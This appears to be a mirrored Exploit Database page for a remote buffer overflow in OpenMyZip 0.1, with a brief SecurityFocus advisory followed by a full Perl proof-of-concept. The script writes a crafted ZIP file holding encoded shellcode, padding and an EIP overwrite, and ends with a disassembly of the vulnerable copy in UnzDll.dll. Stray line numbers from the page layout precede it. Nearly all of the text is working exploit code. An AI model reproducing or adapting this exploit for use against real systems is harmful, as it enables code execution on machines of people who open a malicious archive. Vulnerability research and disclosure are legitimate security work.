OpenMyZip 0.1 – ‘.zip’ Remote Buffer Overflow

Exploit Database
120 阅读

作者： C4SS!0 G0M3S

日期： 2011-05-02
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/35686/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

source: https://www.securityfocus.com/bid/47678/info

OpenMyZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

OpenMyZip 0.1 is vulnerable; other versions may also be affected.

#!/usr/bin/perl

#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability

#[+]Date: 02\05\2011

#[+]Author: C4SS!0 G0M3S

#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html

#[+]Version: v0.1

#[+]Tested On: WIN-XP SP3 Brazil Portuguese

#[+]CVE: N/A

use strict;

use warnings;

my $filename = "Exploit.zip";

print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";

print "\t\tCreated by C4SS!0 G0M3S\n";

print "\t\tE-mail Louredo_\@hotmail.com\n";

print "\t\tSite www.exploit-br.org/\n\n";

print "\n\n[+] Creting ZIP File...\n";

sleep(1);

my $head = "\x50\x4B\x03\x04\x14\x00\x00".

"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00" .

"\xe4\x0f" .

"\x00\x00\x00";

my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".

"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\xe4\x0f".

"\x00\x00\x00\x00\x00\x00\x01\x00".

"\x24\x00\x00\x00\x00\x00\x00\x00";

my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".

"\x00\x01\x00\x01\x00".

"\x12\x10\x00\x00".

"\x02\x10\x00\x00".

"\x00\x00";

my $payload = "\x41" x 8;

$payload = $payload.

("\x61" x 7).#6 POPAD

("\x6A\x30").#PUSH 30

("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX

("\x41" x 10).#10 INC EAX

("\x02\xd3").#ADD CL,BL

("\x51\x58").#PUSH ECX / POP EAX

("\x98\xd1"); #BASE CONVERSION

#"\x98" == "\xff"

# "\xd1" == "\xd0"

#"\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}

$payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE

$payload .=

"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".

"TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".

"5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX

"T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".

"9K7OGT86OPYJ03K9GEU3OKXSKYZA";

$payload .= "\x44" x (2050-length($payload));

$payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098

"\x41" x 5;# PADDING FOR OVERWRITE EIP

$payload .= pack('V',0x00404042);#JMP EBX

$payload .= "\x42" x 50;

$payload .= "\x41" x (4064-length($payload));

$payload = $payload.".txt";

my $zip = $head.$payload.$head2.$payload.$head3;

open(FILE,">$filename") || die "[-]Error:\n$!\n";

print FILE $zip;

close(FILE);

print "[+] ZIP File Created With Sucess:)\n";

sleep(2);

=head

#The Vulnerable Function:

#The Vulnerable function is in MODULE UnzDll.dll on

#Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA

#ocorrs the Buffer Overflow on movimentation of the String Very large.

#Assemble:

#0x00DA6A6F53 PUSH EBX

#0x00DA6A7056 PUSH ESI

#0x00DA6A718B75 08MOV ESI,DWORD PTR SS:[EBP+8]

#0x00DA6A748B55 18MOV EDX,DWORD PTR SS:[EBP+18]

#0x00DA6A778B45 10MOV EAX,DWORD PTR SS:[EBP+10]

#0x00DA6A7A83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0

#0x00DA6A818D9E 50D80000LEA EBX,DWORD PTR DS:[ESI+D850]

#0x00DA6A8774 65JE SHORT UnzDll.00DA6AEE

#0x00DA6A898B8E 84D20000MOV ECX,DWORD PTR DS:[ESI+D284]

#0x00DA6A8F890B MOV DWORD PTR DS:[EBX],ECX

#0x00DA6A918B8E 88D20000MOV ECX,DWORD PTR DS:[ESI+D288]

#0x00DA6A97894B 04MOV DWORD PTR DS:[EBX+4],ECX

#0x00DA6A9A33C9 XOR ECX,ECX

#0x00DA6A9CC743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0

#0x00DA6AA3894B 0CMOV DWORD PTR DS:[EBX+C],ECX

#0x00DA6AA68B4D 0CMOV ECX,DWORD PTR SS:[EBP+C]

#0x00DA6AA9894B 10MOV DWORD PTR DS:[EBX+10],ECX

#0x00DA6AAC81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91

#0x00DA6AB67F 0AJG SHORT UnzDll.00DA6AC2

#0x00DA6AB88BC8 MOV ECX,EAX

#0x00DA6ABA80E1 FFAND CL,0FF

#0x00DA6ABD0FBEC9 MOVSX ECX,CL

#0x00DA6AC0EB 02JMP SHORT UnzDll.00DA6AC4

#0x00DA6AC28BC8 MOV ECX,EAX

#0x00DA6AC4894B 14MOV DWORD PTR DS:[EBX+14],ECX

#0x00DA6AC785D2 TEST EDX,EDX

#0x00DA6AC98B45 14MOV EAX,DWORD PTR SS:[EBP+14]

#0x00DA6ACC8943 18MOV DWORD PTR DS:[EBX+18],EAX

#0x00DA6ACF75 06JNZ SHORT UnzDll.00DA6AD7

#0x00DA6AD1C643 1C 00 MOV BYTE PTR DS:[EBX+1C],0

#0x00DA6AD5EB 0AJMP SHORT UnzDll.00DA6AE1

#0x00DA6AD752 PUSH EDX

#0x00DA6AD88D53 1CLEA EDX,DWORD PTR DS:[EBX+1C]

#0x00DA6ADB52 PUSH EDX

#0x00DA6ADCE8 ABF20000CALL UnzDll.00DB5D8C ; JMP to kernel32.lstrcpyA

#0x00DA6AE153 PUSH EBX

#0x00DA6AE2FF96 8CD20000CALL DWORD PTR DS:[ESI+D28C] ; Here ocorrs the Code Execution:-)

#0x00DA6AE80986 70D20000OR DWORD PTR DS:[ESI+D270],EAX

#0x00DA6AEE5E POP ESI

#0x00DA6AEF5B POP EBX

#0x00DA6AF05D POP EBP

#0x00DA6AF1C3 RETN

=cut